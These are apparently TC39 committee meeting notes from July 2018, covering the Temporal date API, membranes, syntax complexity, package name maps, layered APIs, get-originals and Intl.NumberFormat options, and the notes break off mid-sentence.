Rennes CEDEX - France
|
https://lkml.org/lkml/2009/1/17/39
|
CC-MAIN-2016-22
|
refinedweb
| 428
| 74.79
|
The Simple API for XML (SAX) is one of the first and currently the most popular method for working with XML data. It evolved from discussions on the XML-DEV mailing list and, shepherded by David Megginson, [1] was quickly shaped into a useful specification.
[1] David Megginson maintains a web page about SAX at.
[1] David Megginson maintains a web page about SAX at.. Since there's no good reason not to use SAX2, you can assume that SAX2 is what we are talking about when we say "SAX."
SAX was originally developed in Java in a package called org.xml.sax . As a consequence, most of the literature about SAX is Java-centric and assumes that is the environment you will be working in. Furthermore, there is no formal specification for SAX in any programming language but Java. Analogs in other languages exist, such as XML::SAX in Perl, but they are not bound by the official SAX description. Really they are just whatever their developer community thinks they should be.
David Megginson has made SAX public domain and has allowed anyone to use the name . An unfortunate consequence is that many implementations are really just "flavors" of SAX and do not match in every detail. This is especially true for SAX in other programming languages where the notion of strict compliance would not even make sense. This is kind of like the plethora of Unix flavors out today; they seem much alike, but have some big differences under the surface.
SAX describes a universal interface that any SAX-aware program can use, no matter where the data is coming from. Figure 10-1 shows how this works. Your program is at the right. It contacts the ParserFactory object to request a parser that will serve up a stream of SAX events. The factory finds a parser and starts it running, routing the SAX stream to your program through the interface.
The workhorse of SAX is the SAX driver. A SAX driver is any program that implements the SAX2 XMLReader interface . It may include a parser that reads XML directly, or it may just be a wrapper for another parser to adapt it to the interface. It may even be a converter, transmuting data of one kind (say, SQL queries) into XML. From your program's point of view, the source doesn't matter, because it is all packaged in the same way.
The SAX driver calls subroutines that you supply to handle various events. These call-backs fall into four categories, usually grouped into objects:
Document handler
Entity resolver
DTD handler
Error handler
To use a SAX driver, you need to create some or all of these handler classes and pass them to the driver so it can call their call-back routines. The document handler is the minimal requirement, providing methods that deal with element tags, attributes, processing instructions, and character data. The others override default behavior of the core API. To ensure that your handler classes are written correctly, the Java version of SAX includes interfaces , program constructs that describe methods to be implemented in a class.
The characters method of the content handler may be called multiple times for the same text node, as SAX drivers are allowed to split text into smaller pieces. Your code will need to anticipate this and stitch text together if necessary.
The entity resolver overrides the default method for resolving external entity references. Ordinarily, it is assumed that you just want all external entity references resolved automatically, and the driver tries to comply , but in some cases, entity resolution has to be handled specially. For example, a resource located in a database would require that you write a routine to extract the data, since it is an application-specific process.
The core API doesn't create events for lexical structures like CDATA sections, comments, and DOCTYPE declarations. If your environment provides the DTD handling extension, you can write a handler for that. If not, then you should just assume that the CDATA sections are treated as regular character data, comments are stripped out, and DOCTYPE declarations are out of your reach.
The error handler package gives the programmer a graceful way to deal with those unexpected nasty situations like a badly formed document or an entity that cannot be resolved. Unless you want an angry mob of users breaking down your door, you had better put in some good error checking code.
In this first example, we will use SAX to create a Java program that counts elements in a document. We start by creating a class that manages the parsing process, shown in Example 10-2.
import org.xml.sax.XMLReader; import org.xml.sax.helpers.XMLReaderFactory; import org.xml.sax.InputSource; import java.io.FileReader; public class SAXCounter { public SAXCounter () { } public static void main (String args[]) throws Exception { XMLReader xr = XMLReaderFactory.createXMLReader(); SAXCounterHandler h = new SAXCounterHandler(); // create a handler xr.setContentHandler(h); // register it with the driver FileReader r = new FileReader(args[0]); xr.parse(new InputSource(r)); } }
This class sets up the SAX environment and requests a SAX driver from the parser factory XMLReaderFactory. Then it creates a handler and registers it with the driver via the setContentHandler( ) method. Finally, it reads a file (supplied on the command line) and parses it. Because I am trying to keep this example short, I will not register an error handler, although ordinarily this would be a mistake.
The next step is to write the handler class, shown in Example 10-3.
import org.xml.sax.helpers.DefaultHandler; import org.xml.sax.Attributes; public class SAXCounterHandler extends DefaultHandler { private int elements; public SAXCounterHandler () { super(); } // handle a start-of-document event public void startDocument () { System.out.println("Starting to parse..."); elements = 0; } // handle an end-of-document event public void endDocument () { System.out.println("All done!"); System.out.println("There were " + elements + " elements."); } // handle a start-of-element event public void startElement (String uri, String name, String qName, Attributes atts) { System.out.println("starting element (" + qName + ")"); if ("".equals(uri)); else System.out.println(" namespace: " + uri); System.out.println(" number of attributes: " + atts.getLength()); } // handle an end-of-element event public void endElement (String uri, String name, String qName) { elements ++; System.out.println("ending element (" + qName + ")"); } // handle a characters event public void characters (char ch[], int start, int length) { System.out.println("CDATA: " + length + " characters."); } }
This class implements five types of events:
Initialize the elements counter and print a message.
Print the number of elements counted.
Output the qualified name of the element, the namespace URI, and the number of attributes.
Increment the element counter and print a message.
Any other events are handled by the superclass DefaultHandler .
We run the program on the data in Example 10-4.
<?xml version="1.0"?> <bcb:breakfast-cereal-box xmlns: <bcb:name>Sugar Froot Snaps</bcb:name> <bcb:graphic <bcb:prize>Decoder ring</bcb:prize> </bcb:breakfast-cereal-box>
The full command is:
java -Dorg.xml.sax.driver=org.apache.xerces.parsers.SAXParser SAXCounter test.xml
The -D option sets the property org.xml.sax.driver to the Xerces parser. This is necessary because my Java environment does not have a default SAX driver. Here is the output:
Starting to parse... starting element (bcb:breakfast-cereal-box) namespace: number of attributes: 0 CDATA: 3 characters. starting element (bcb:name) namespace: number of attributes: 0 CDATA: 17 characters. ending element (bcb:name) CDATA: 3 characters. starting element (bcb:graphic) namespace: number of attributes: 1 ending element (bcb:graphic) CDATA: 3 characters. starting element (bcb:prize) namespace: number of attributes: 0 CDATA: 12 characters. ending element (bcb:prize) CDATA: 1 characters. ending element (bcb:breakfast-cereal-box) All done! There were 4 elements.
There you have it. Living up to its name, SAX is uncomplicated and wonderfully easy to use. It does not try to do too much, instead offloading the work on your handler program. It works best when the processing of a document follows the order of elements, and only one pass through it is sufficient. One common task by event processors is to assemble tree structures, which brings us to the next topic, the tree processing API known as DOM.
|
https://flylib.com/books/en/4.384.1.73/1/
|
CC-MAIN-2021-04
|
refinedweb
| 1,369
| 57.37
|
2018-07-26B), Maggie Pint (MPT), Timothy Gu (TGU), Sebastian Markbage (SME), Dustin Savery (DSY), Mike Murry (MMY), John David Dalton (JDD), Alex Vincent (AVT)), Nathan Hammond (NHD)
Agenda
Temporal Proposal update
(Maggie Pint, MPT)
MPT: JavaScript only supports two time formats, local and UTC, and this is not very ergonomic; this was part of the motivation for "civil" datetimes. Technically, the spec text and submission falls under the requirements of Stage 2 advancement, so I am requesting that. (Reads slides describing differences between civil datetimes and instants). For parsing timezones, the ISO standard does not specify the timezone (just offsets), but there is a big need for this in JavaScript. For the
plus method, we take an object with desired units and apply them in descending order of size. This is open to discussion, since you could have scenarios like (2/29/2016 plus 1 year and 2 months could give you either 4/28/2017 or 4/29/2017). You can also imagine these situations happening for days that aren't precisely 24 hours (consider shifts for Daylight Savings Time).
JHD: For this plus issue, if you pick one of the two behaviors, can you build one off the the other? In other words, building the rounding down behavior over two operations, but if you do the rounding at the beginning you may not be able to ever achieve that same result (so I would prefer the rounding behavior at the end).
MPT: I have to check, but I think there's a workaround if you do carry it, but I think it's hard to get the same workaround if you don't carry it.
JHD: If that's true, I would lean towards the option that allows you to achieve both behaviors (even if it requires multiple operations).
MPT: To achieve comparisons, for CivilDate/Time/DateTime/Instant we can convert to integer value that unit since Unix epoch, just as we do for Dates today. How should we compare ZonedInstant
valueOfs? Do we also convert these to? Should two ZonedInstants with different timezones equivalent (
===)?
JKN: Why nanoseconds instead of milliseconds as we do for Date?
MPT: There's a lot of demand for increased precision. Since BigInt is now available, it's not difficult for us to achieve this precision.
If we were to depart from InstantTypes and
MM: Clarity and avoiding misunderstanding is the best way to go. And I think ZonedInstant is the best one.
MPT: Thanks, and I would love more feedback on this. And there's more controversies, like the strong camp to call these types
local, to match Java, to mean zoneless.
MM: I agree that local is a disaster.
AW: Maybe "Simple"?
MPT: Elixir uses "Naive", but that's a bit controversial too. I like Simple, but again we're really not sure yet. Another controversy is whether this should be a new global called
Temporal, or a built-in module.
**SCR:**I was wondering how this interops with Intl.DateTimeFormat, etc. I would like to see any APIs that generate DateStrings to be Intl first. Where is toLocaleString?
MPT: Sort of by definition this would have to be a separate proposal.
WH: Currently you ignore leap seconds, requiring smearing them away. How will you work with operating systems, like upcoming Windows for example, which support leap seconds and in fact forbid smearing leap seconds?
MPT: Unfortunately, leap seconds are not included in Unix time and never will be. The problem with leap seconds is we actually have to store a table with all the leap seconds.
WH: I understand that you can't really predict them until they happen. But unfortunately, upcoming regulations require leap second support and forbid smearing to achieve it, so we should be compliant. I've read Microsoft's paper on why and how they will implement them in Windows.
MPT: If we go with the ValueOf implementation, this will break with leapseconds.
MPT: Leap seconds are my least-favorite part of working with time.
WH: Mine too. I'm curious how everyone else will deal with them. Microsoft's paper on leap second support doesn't include the API they'll provide.
API: Someone brought up this issue in the tracker. Unfortunately, there is no way in ECMA-262 to distribute data about dates.
MPT: Has anyone at CLDR looked at it?
API: Yeah, they have, but unfortunately this process requires a lot of time. Browsers need to ship updates, etc. It could be long enough of a delay that it's too late before the leap second actually happens.
API: I had a question on valueOf. For time, seconds since midnight makes sense. Instead of days since epoch, milliseconds might be better, so that you can compare a CivilDate to DateTime.
MPT: Now you're implying that there's a correlary between Dates and DateTimes
API: I'm in the camp that ZonedInstance should not compare. The programmer should say what they mean. If they want to compare two ZonedInstance, they should convert to UTC, for example.
AWB: You mentioned conversion to and from strings. I want to understand the format you're using to toISOString (formatting and parsing).
MPT: So, I think you're talking about the subset that we currently support.
AWB: I think you need to be explicit.
MPT: Yeah, there's a few things that aren't ISO compliant, like toString on time only...
AWB: It does have a time-only format.
MPT: Yeah, I'm just munging the standards in my head...
AWB: I don't like introducing this as a global. I would rather see it as a module.
JHB: How would you use it in scripts? So you can't do anything synchronously in scripts?
AWB: Yeah
JHB: I imagine that's not satisfactory for many people.
AWB: I oppose seeing this in any form other than a module. We need to stop polluting the global namespace.
JHB: Once that's supported, that sounds like a valid concern.
AWB: I have to put a stake in the ground somewhere, and this is it.
BFS: Did you just say import from a script?
AWB: If the problem is that we cannot import in a script, maybe we could allow synchronous import in scripts.
YK: I wanted to say, in the jQuery era, every program was written in asynchronous style. The idea that everyone has to wrap to get common idioms was the jQuery model.
TST: Maybe doing it as a module would be a solution to this, but I'm a bit concerned that there's not a lighter-weight way to do this.
MPT: There's a library that is basically does this—strips out the heavy aspects. But unfortunately just the computations themselves come out to be about 56kb gzipped, and we've even checked that all the code-paths are used, so it may not be possible to get more lightweight than that.
TST: Moment.js and Moment Locale is 66kb, so they've made it quite small. I think it's worth doing this in a very light-weight way.
MPT: So, what's the concern here? Sure, we could expose CLDR data in Intl. What's the concern in going in this way? The proposal is large?
TST: This is already a complex proposal, so would do ECMA-402 follow-up in a separate proposal. That sounds like too much complexity if you can't do it in an atomic proposal.
MPT: OK. I think that's a valid concern.
MM: So, I want to confirm, there is nothing in this proposal that gives you direct access to the current time or current date, right?
MPT: We did add some current time support. It's definitely something I'm willing to discuss, though.
MM: Okay, so that's a non-starter for me. It's really important that you keep arithmetic separate from access to anything in the outside world. It's the difference between system-mode and user-mode. It's very important to keep any hidden mutable state outside the primordials, with the grandfathered exceptions of Math.random, Date.now, and access to current timezone.
WH: It's kind of inevitable that you will get access to the current time at a very coarse granularity within any library that allows you to convert between UTC and local time; the rules of conversion change over time, so you can determine that just from the conversions themselves.
MPT: I mean, it's possible to move this off to a separate proposal, but I would like a more concrete suggestion on what to do.
MM: I think you need to separate those, though. If we want to consider that as a separate proposal, that's fine.
MPT: I would say, raise a GitHub issue, and we can start to hash it out. I would like to you propose what is the "ergonomic way" to handle this.
NHD: Java has all these separate partitions of their Date objects, e.g. YearMonth, let's call them significant figures. Is tackling significant figures something we want to do within this proposal? For example, given the string
"2018", a valid ISOString, but does it refer to January 1st, 2018 or merely the year?
MPT: So if someone made a object with 2018 and no other values, should it print out 2018?
new CivilDate(2018)
NHD: My question is whether or not this is a goal to account for significant figures given a certain input.
MPT: My instinct is no, simply because if we really want a year-month type or similar, my feeling is that if it's that useful, then introduce it in a follow-up proposal. At the end of the day, the no-surprises model is super important for a proposal like this. The developer should be explicit about what they want.ˆ
NHD: Thank you for your thoughts.
MAA: The point of we shouldn't add dates together (separate from the plus method), but have we considered the TimeSpan/TimeInterval type?
MPT: Isn't it YK who really likes the idea of a datetime span type? A lot of libraries have an interval types. I'm trying to keep this reasonable in scope. A lot of these questions come down to, "can we have another type?" and the answer is yes, but I'm just trying to get these current ones done.
TST: Coming from the experience of having these types in other languages, those types are super expressive. Two dates separated from each other give you an interval type, which is expressive and ergonomic for the user.
YK: The rust time library is very small. The thing I want to say here—people aren't asking for more things, but a smaller set of things may work better plus this extra thing. Can we find a smaller kernel we can use here, instead of a 1000 types. It would both be very useful and I would like it.
RGN: I wanted to ask about valueOf, going back a little bit. Is there a reason we're returning numeric as opposed to string?
MPT: It could return a string!
RGN: It changes the meaning of plus from add to concatenate.
AWB: I think you need to look closely at the difference between toString() and valueOf(). You should maybe define them so you almost get strings.
RGN: I think greaterThan and lessThan use valueOf, and those work better on numbers than strings.
AWB: You need to look carefully at those operators.
MPT: There's merit in having an internal number representing the date since the computations become linear, when otherwise they would not be. (Though the leap seconds point, throws a wrench in this). The valueOf result doesn't need to be that number, however, it could be some other representation.
**SCR:**Could you return a Date from valueOf?
MPT: A lot of the reason for this API is that there is no mapping between a CivilDate and a Date; it's lossy.
WH: For the question of valueOf being numeric, I don't think leap seconds will preclude that since you could have two variants of valueOf with a default less accurate one representing the Unix computation and a more accurate one supporting leap seconds.
**SCR:**If we do separate these concerns into multiple proposals (including the concerns regarding Intl compatibility), I would like to at least see the two proposals land at the same time.
MPT: Unfortunately, there's not a lot structure into this process to guarantee for these proposals to land at the same time.
LBR: I think what Maggie is doing is to follow the philosophy of this committee. It would be nice to have someone working at the same time on 402, but I think what Maggie's doing is excellent and we have a huge group of people that could volunteer to work on the 402 component Shane is talking about.
**SCR:**I will open an issue to discuss.
SYG: Are daylight saving times automatically not in this proposal? When you make a ZoneInstant with an explicit timezone,
MPT: Don't understand the question. If you pass the word "local" to a ZoneInstant, it will take the browser's timezone.
WH: [Clarifying SYG's question] Do you have a notion of a
US/Los_Angeles time zone whose UTC offset changes over the course of a year?
MPT: Yes it supports that.
DE: I think JS should support a better built-in date library as other languages do. I think a standards venue to design the good Date library makes sense. But 16kb isn't absolutely nothing. We've seen a lot of proposals over the years, and some of them have gotten a lot of pushback. I think TC39 is a great place to develop different standard library features, because we have a lot of different viewpoints here (industry, academia, etc.). I would like to see this proposal continue because I think it's a great precedent for other standard libraries. For the 402 point, I think we should work with ECMA-402 so that the proposals can leverage eachother, but I don't think Maggie needs to be the person doing it. BigInt has 402 integration as well, and in V8 BigInt shipped without 402 together, but Mozilla did. We can encourage them to be viewed as a single proposal if we think that's important. We also should think about TST's approach of just shipping the data without the built-in library.
MPT: I think we will not advance at this time, partly because some of the spec text fell after the deadline.
AK: Can you clarify what you mean by not ready before the deadline for the proposal?
MPT: Some of the spec text landed about two days ago.
WH: As an aside, if anyone is hoping to advance proposal levels at a meeting, I'd appreciate marking the proposal as going for advancement 10 days before the meeting. I look at those much more carefully than ones marked as status updates.
Conclusion/Resolution
- Not advancing yet due to deadline
Abstractions for membranes
(Alex Vincent (expert invited by Mark Miller, MM))
MM: The purpose of this is a lot of useful lessons for what Alex did here for the committee. First of all, a membrane is a boundary in the object graph between two subgraphs. Proxy and WeakMap in ES6 were introduced to enable these membranes. You can think of these as "wet" and "dry" components separating each side of the membrane. As needed, the membrane grows dynamically to encompass more wet components. Some of the goals for membranes are to create these defensive security boundaries for impenetrability.
WH: Do you mean unidirectionally or bidirectionally impenetrable?
MM: Bi-directionally impenetrable.
MM: (Reads slides). For the TC39 committee, this is a very great way to express security policies that we think the committee should be familiar with.
AVT: (Reads slides).
DH: May I suggest a slightly different metaphor? Perhaps Inside/Outside.
AVT: Inside/Outside may make a ton of sense in this context, but you're about to see that this happens in a three-dimensional context as well.
DH: So I need to understand biology to understand this presentation?
MM: No, we'll explain shortly, and I think it will be clear to you.
AVT: (Reads slides).
MM: A membrane boundary acts a lot like a realm boundary, but you don't get magical access to class state, which holds better for this security model.
Questions
BFS: I had a question with your coordinator with your proxy-mapping. It seems like there's no desire to get Membranes into a proposal before TC39. Are there any data-types needed though?
AVT: There's nothing special about Proxy mapping that we would need a new data-type for.
MM: None of the membrane work have identified anything that's wrong or lacking in the foundations. Even just to build the higher levels, it's just that the higher-levels need to be packaged together and better explained to users. But nothing in the immediate future needs to be brought forward to this committee.
BFS: Can you talk about weak references in the three-way membrane example you showed?
MM: Dean do you have thoughts on WeakRefs and multi-way membranes?
DT: No, I haven't thought about n-way membranes, but it's interesting. [In follow-up discussion with BFS and MM, we determined that the current behavior of the membrane code seemed correct: if any proxy or target is retained, so should any related proxies and target. The reason is that clients could use WeakMaps for softfield on any of those underlying objects.]
SYG: On IRC, Don't browser debuggers all have blackboxing of scripts already?
AVT: No debug means, by default, I want to blackbox.
TST: Minified code is blackboxed by default. This is usually about tooling, not about language.
MM: I also see this as a tooling issue, but we need some conventional signal from the developer to tell the debugger/tooling what should/should not be blackboxed.
Reviewing the future JS syntax throughout the current proposals (overflow)
(Leo Balter, LBR)
LBR: We had a PR proposing to redefined the Catch parameter to a formal parameter. Doing this in Test262 was deceptively difficult: while the spec change was extremely small, but expanding the grammar is actually quite long. So sometimes it's easy to talk about proposals, but very difficult to implement them. Why? Yearly releases are great for long-term goals, but hard to plan for specific releases. People have very specific areas of expertise, and topics are very complex that it's hard for all delegates to comprehend everything. These aren't all bad things, but we do need to improve how we collaborate with each other. How do we talk to each other more, combine efforts, promote guided decision-making? To summarize proposals involving syntax, we already have (before the start of this meeting) a very long list of Stage 3 proposals involving syntax, a pretty long list for Stage 2, but few syntax proposals for Stage 1. There's a lot of syntax changes. (Shows examples of many new syntax features in a single program). So there are several potential actions for our committee, we can identify fields of interest and form groups to create collective recommendations—reaching out beyond your local teams. I do this with RW a lot to bounce ideas off of. My recommendation is to help delegates to identify more fields of interest from other delegates, and perhaps we should experiment with drafting syntax proposals within other proposals to see how they work together. If they will be connected together in an eventual future, we should design them together as well. Finally, we should experiment using Babel more and more.
YK: I appreciate the slide that shows all the features together, but it matters a lot in a language that combines a lot of different syntaxes, and we should think about whether realistically you will use these syntaxes together. For example, you don't have to worry as much about the syntax for defining a method to collide with syntax that defines grouping. (Pointing to slide). This can be hard to lex for humans, and this slide with the class does a better job at illustrating than the previous one which is unrealistic. Maybe a good heuristic is how many covergrammars are needed?
MM: So, I very much like what you're getting at. I think the complexity budget needs more emphasis and needs more teeth. We talk about complexity budget, and it's a useful metaphor. In real life, there are many things that I want that are genuinely good, that I don't buy because they are too expensive. I can know this because I have a budget.
MM: Allen reminded me that when we were building up to ES6. We put up all the features on the whiteboard, and we spent all 3 days on triage. When we put them all up on the board together, we crossed off many things that were wonderful because they fell below threshold, a threshold we could only see when we saw the overall cost of everything. That was before the proposal process. The proposal process is a good thing, but it creates a situation where it seems like advancing a proposal is tangible progress, and it doesn't seem like rejecting proposals is tangible progress. But it doesn't show us how removing features is progress. We did once use a subtractive process, "use strict". We should be more sensitive to when we have subtractive opportunities and take those seriously. Like not having automatic semicolon insertion inside classes or modules. We squandered those opportunities to simplify.
LBR: I really like this perspective. I tried to cover this from a high-level point of view, I appreciate this perspective because it is from a different point of view.
BT: The proposal process gives us an opportunity to think about costs and tradeoffs, but we don't have the ability to grant something Stage 2, for example while considering all the other stuff that comes along with it. And that's a problem, we should aim to do that better.
**SCR:**These are new features when you're writing JavaScript natively, but I've noticed there's increasingly a movement of languages that compile to JavaScript. With CoffeeScript and TypeScript now, these languages clearly offer something that the industry wants. JavaScript needs to be extremely efficient, since that's what these languages ultimately compile to. JavaScript should have almost a bigger emphasis on performance than expressiveness for this reason. There's no single one-size-fits-all solution for this, people may want different syntax features, however one thing that everyone wants is performance.
LBR: That's a great point and kind of what I'm trying to talk about when I use the term "sandboxes".
WH: A few things are going on here. Focusing on just syntax, I've been keeper of the syntax for a while and made sure that syntaxes of various proposals don't conflict; that hasn't been a major issue with conflicting syntax that I have noticed. The opportunity cost of syntaxes precluding desirable future evolution of the language, I would say is a bigger issue. I would be more-or-less opposed to creating a standing syntax group; instead, if issues arise, we should deal with them ad hoc.
WH: Another issue more general than the syntax is multiple proposals with overlapping use-cases. I would consider this a big problem as well, leading to jockeying for one of them to get priority by advancing through the stages first. I'd like to see more discussions on this.
LBR: I am not suggesting a group for syntaxes, but rather collaboration to create guided decisions. For example, as an individual, a group of champions could recommend something and present it to the greater committee.
WH: To be clear, ad hoc groups are great. I just don't want a standing syntax group with periodic meetings.
DD: How many meetings are you allowed to have before it's considered a standing group?
YK: I don't understand what the objection is to that group interest?
WH: With a standing group, everyone who has an interest will be forced to attend a lot of unproductive meetings. The alternative is to create an ad hoc meeting, where you send an announcement and then you know what the agenda is. Standing groups tend to acquire a life of their own, and if there are overlapping groups, it can create a huge waste of effort and time.
BT: It's worth knowing as a deliberative body, we can create sub-committees. Some groups have been excellent at creating minutes and being accessible to people, especially to this room. Groups in general are things that standards bodies do often and work well.
LBR: I think there is something with groups. If we can fetch the best highlights. It's already being done with some groups. But like we have the Intl work that comes into TC39 and gives a summary presentation. The same thing happened with the numerics/literal separator that was a conflicting proposal, and we sat together, then came to TC39. We had the champions of both proposal to match your thoughts.
AKI: To respond to something WH said, the rigidity against any sort of collaboration outside the realm of the meetings is problematic. Nothing is going to get done if there are no external groups...
WH: That's not what I'm saying.
RJE: He does not want a syntax group that meets regularly. But rather only when needed.
DE: I wanted to support the idea that LBR brought up. Asking for an early prototype before stage 2. I don't think we need to ask for a full implementation, and I don't think we need Babel, but in the Temporal proposal, which has nothing to do with Babel because it's not a syntax proposal, the polyfill helped a lot because it helped flesh out some of the details. Some things are hard to prototype, like BigInt and symbol, but I think we should encourage champions to make these prototypes whenever possible. I'd like it to become a more regular thing. I agree with a lot of you about groups: I think it will be useful to have an open structure to discuss things. It only helps to openly discuss proposals outside of meetings. Group meetings should have agendas, and in fact some of the groups I am in have agendas. When we didn't have things on an agenda, we cancelled the meeting.
BFS: We have some people wanting to encourage use in Babel in Stage 2 as a testing ground, and I want to be weary of that. We can get situations where we get conflicts, where ecosystem adoption outpaces our research into the grammar, and we still have discussions doing on on Decorators, where ecosystem adopers have opinions different than this committee. I think it's worked out really well where we let TypeScript use the colon operator in more places. But I'm weary of always using Babel.
LBR: I understand that and admit there are some tradeoffs that we always need to consider but Babel is evolving to a system where some features are not really encouraged. We can't really ever say "hey, don't use this," so I think it's OK for that community to be able to do that. Consider Object Rest/Spread, since it was adopted so widely we had early feedback, and it helped develop the syntax and encouraged browser implementation.
YK: I think we shouldn't focus too much on what has historically happened with Babel. More importantly, you have two choices: discourage people from using features in early form (no Babel), in which case you lose feedback; or put it in Babel in which case you get feedback. I think the thing we should try to do is encourage people to understand the risks and benefits of being early-adopters. My opinion is that we should minimize the cost of both of those goals and not do so by having a global policy by saying people shouldn't use those features. I think everyone should use caution, and that early features are notoriously unstable. But the valuable feedback from early stage users in Babel makes is a good thing.
LBR: Among users of babel, creating a sandbox for ourselves could be a possibility. For ourselves it proves that it works.
DE: Just about babel, the messaging about not using early-stage proposals is getting stronger. Babel 7 makes stage presets removed. I'm glad that the Babel team is communicating and now being especially forceful on the stage process. Babel does implement early features; they won't stop getting PRs, and there is a lot of community interest.
JRL: I want to be clear, we're talking about Babel implementations or syntax?
BFS: I'm not talking about semantics, I'm talking about the ecosystem about something occurring in TC39—widespread adoption, or a grammar that we effectively must work around.
JRL: So we are trying to make it more explicit to end users that they are using early proposals. Like DE said, we are removing presets, but if they want to enable specific proposal features, they can enable it with a plugin, and there is no easy way for them to enable all features, only the specific features that they want. We kind of learned from the decorators issue, where people used these features way too early, and make it very clear to people that these are not real JavaScript features.
KS: My interpretation, thinking about the features and looking at the screen, is that we are running up against diminishing returns. We got a lot of bang for the buck in ES6 features: async functions, async generators. But at this point we are running into diminishing returns, and we need to make sure we are overestimating the utility that each of our proposals brings. There is a bias to believing that our syntax is going to make their lives better. But JS developers have a lot of problems and pain points, and I'm not convinced that syntax is high up there on the list. On the other hand, Temporal and proposals like that seem to really address pain points, and I'm excited about development in that direction. Waldemar brought up something about a standalone syntax group creating work for itself, as groups sometimes do. As part of our participating in this group, we should look in the mirror and figure out whether we are adding work for ourselves or whether we are making things easier for our users.
TST: I would push back on this. I do think that the adoption of more syntax features by the community through Babel is a strong signal that there is a lot of value in this. I don't think that we are in an area of diminishing returns for more statically analyzable programming styles. I want to push back against the diminishing returns argument. We will eventually get there, but seeing these slides, I'm not convinced we are there uet.
API: I just have a comment about how a polyfill helped Temporal and other proposals. If you are a champion and you don't have time to write a polyfill, just post in the reflector, and plenty of people at our companies would be more than happy to help get those polyfills created.
Package name maps
(Domenic Denicola, DD)
DD: Okay, so there are 3 proposals I am working on that DE thought would be interesting for TC39. We have 15 minutes, so 5 minutes each. Um, so the first one is something called "Package Name Maps". As you know, Node does module name specifier resolutions using a complicated algorithm with file extensions and crawling the filesystem, etc.
DD: We don't have the option to crawl the web URL space, but people want very similar experiences, like importing from lodash and have that map to a URL; i.e. use these simple string names. On the web now, this is just not allowed. Anything on the web that doesn't start with / or ../ or ./ just isn't allowed.
DD: The proposal, which is not a TC39 proposal, but if it were would be in like "stage -1", is this package name map that you would set up before you do any imports. It tells how to construct a URL for lodash or moment, etc. If you are directly writing all the code, you could write these yourselves, but if you're coordinating libraries, and you want them all to agree the version of
moment for example, this lets you do that. That's the basic idea...
DD: Another interesting feature about Package Name Maps: like people who are familiar with Node.js would know, in different places in your app, you want different versions of the same package. We have that built in. You can scope versions to different part of your app.
DD: Progress-wise, we're not close to a spec. We've started writing some tests, and they're passing.
DD: One FAQ: why not an imperative API for module resolution? It turns out, jumping back and forth from JS for every module specifier is not very efficient at all. It's not completely ruled out, but I like package name maps better.
DD: Okay, so that is Package Name Maps. 5 minutes. I think we will not have questions because we do not have time. I'm just here to make the committee aware of these issues.
AK: I don't think it's a good use of time if you're not willing to discuss these questions.
DE: I think it's good to discuss because of the cross-cutting concerns, and since it relates to other proposals involving layering, etc.
BT: Yeah, the ability for us to give feedback is important.
DD: These all have issue trackers. Given time constraints, and the audience for these proposals, GitHub is probably the right place for feedback, instead of plenary.
Layered APIs
(Domenic Denicola, DD)
DD: Layered APIs are an effort to work on high-level features. We talked in the extensive web manifesto, we wanted to start working on low-level features, but now that we've done that we should work on high-level features. We want these to be loaded lazily since not everyone will use these features.
DD: The other constraint is on the standards process. The layered API, as a feature, is a high-level feature and we have to accept the high-level web manifesto. This is a good in a lot of ways. There is a high-level HTML widget called details. We went through inventing shadow DOM to allow for details, but that still didn't completely work. So future features will not suffer from the problems of details. But there are still some things that are fundamental.
DD: One of the features I brought up previously is the ability to censor source code, which would be very useful to web developers.
Get Originals
(Domenic Denicola, DD)
DD: Another feature that builtins have that web developer created APIs do not is the ability to use the original versions of things. In particular, if you look at a DOM API, like, for example, querySelector, if you were trying to implement that in JavaScript, it turns out the brower's querySelector is not affected by users messing with prototypes. It just runs native code. This is important for robustness for multiple websites. What if we change how it's used slightly? Would it break? Possibly, but because it is implemented in C++, it does not break. How do we bring that same ability to the web?
DD: It turns out that we can do this on the web. But it only works if you're loaded first, not loaded in a module. To solve this for things not loaded first, I have a proposal called get-originals. Note that the API is undergoing a lot of churn; don't take the shape as very essential. The basic example is that you have this function that calls a lot of built-ins. It calls a getter, calls a method, etc. How can we do that in a way that is not susceptible to tampering? In this version of the API, it's broken into a bunch of global functions—so that's how you would get access to it.
DD: An FAQ. If you're approaching this from the TC39 perspective, one approach i: Why don't we just give unique identifiers to all the built-ins? Instead of my version up here, where you just call the original object? It turns out this is really brittle, because we move things across the prototype chain quite often. That wouldn't be great.
DD: Another interesting thing is the idea of not reify-ing the properties of built-in objects. But now if you can call the original method directly, you don't have to reify the accessor or method. That's good for efficiency.
DD: We think tooling is a key part of this. In my version, it's not realistically usable by itself. It needs tooling. We have other ideas in the tooling space, like if we get 100% test coverage, then we can create a super-poisoned environment where we fail the test if you somehow access the poisoned elements.
September 2019 Meeting Location
(Rex Jaeschke, RJE)
RJE: Do we have opposition to going to Europe a second time next year?
AK: I believe JHD was pushing strongly against 2 Europe trips.
YK: I am also against two Europe trips.
**SCR:**I've never been to Barcelona and it seems like a cool place to go. With slides, it's not terribly difficult to attend remotely.
JHD: I think that's aspirational. It's difficult to attend these meetings remotely.
DE: I am an unusual European delegate since I have a lot of family in New York. In the past we've gotten a lot of complaints about the scheduling happening too late, so I would like to determine this today.
RJE: I would like to propose New York City then.
JHD: That means we have zero in the Bay Area. We could host one there.
DE: Google has offered to host once a year, and they're already hosting one in New York.
SGO: Google is happy to host multiple times if necessary, and we can host in the Bay Area.
??: We should have two in the bay area.
YK: Two in the Bay Area means three on the West Coast?
DE: Three if you include Arizona.
TST: Flying here isn't too much the issue, even dialing in is quite difficult for people on other continents.
Conclusion/Resolution
- no conclusion
Intl.NumberFormat Unified Feature Proposal for Stage 2
(Shane Carr)
**SCR:**This proposal essentially adds new features within the options object to add features that have been requested by many users. First, spec updates: we add the option narrowSymbol to the currencyDisplay property (i.e. $ instead of $US). Next, Units. The Intl API has a concept called Style, and we add this style entry called
unit, which has narrow, short or long options: (i.e. Narrow
"º", Short
"º F", Long
"º Fahrenheit"). Next, Scientific and Compact Notation will now be represented using the new option
notation, with options "compact", "compactDisplay", "scientific". Another feature that's been requested is Sign display, and this is a good things for Intl to govern best practices for locales. Sign Display uses various options like
auto,
always,
never,
except-zero.
WH: If you provide -0 and always show sign, does it return "-0" or "+0"?
**SCR:**There was a question about this on the GitHub issue. I would refer to that.
**SCR:**There's also the option of
currencySign which enables an accounting format. Now, let's talk about combining options. Most options are orthogonal, and can be used together. Thanks to DE and the ECMA-402 subcommittee for helping me with this proposal.
JHD: WHat happens if I pass in an invalid option?
**SCR:**If your option is not in that set, the spec says throw a RangeError. The one exception is
